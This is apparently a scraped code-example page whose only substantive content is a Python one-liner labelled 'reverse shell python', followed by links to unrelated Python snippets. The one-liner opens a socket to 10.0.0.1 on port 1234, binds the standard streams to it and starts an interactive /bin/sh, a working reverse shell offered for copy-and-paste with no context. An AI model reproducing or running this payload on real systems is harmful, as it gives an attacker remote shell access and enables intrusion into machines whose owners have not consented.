Search
 
SCRIPT & CODE EXAMPLE
 

PYTHON

reverse shell python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Comment

PREVIOUS NEXT
Code Example
Python :: matplotlib boxplot remove outliers 
Python :: how to add special token to bert tokenizer 
Python :: convert base64 to image python 
Python :: Difference between end and sep python 
Python :: pyqt display math 
Python :: convert hex to decimal python 
Python :: set python3.7 as default ubuntu 
Python :: remove duplicates based on two columns in dataframe 
Python :: take first n row of dictionary python 
Python :: how to find how many processors you have with python 
Python :: ec2 upgrade python 3.7 to 3.8 
Python :: next day in python without using datetime 
Python :: pandas groupby get all but first row 
Python :: python compare if 2 files are equal 
Python :: bs4 table examples python 
Python :: discord python wait for user input 
Python :: sqlalchemy if a value in list of values 
Python :: python ls 
Python :: get n random numbers from x to y python 
Python :: main arguments python 
Python :: how to make a button circular in python 
Python :: python previous answer 
Python :: python filter a dictionary 
Python :: python pop up box 
Python :: get rid of n in string python 
Python :: convert excel to csv using python 
Python :: python speech recognition module 
Python :: python wikipedia api search 
Python :: first row as column df 
Python :: get string between two characters python 
ADD CONTENT
Topic
Content
Source link
Name
2+4 =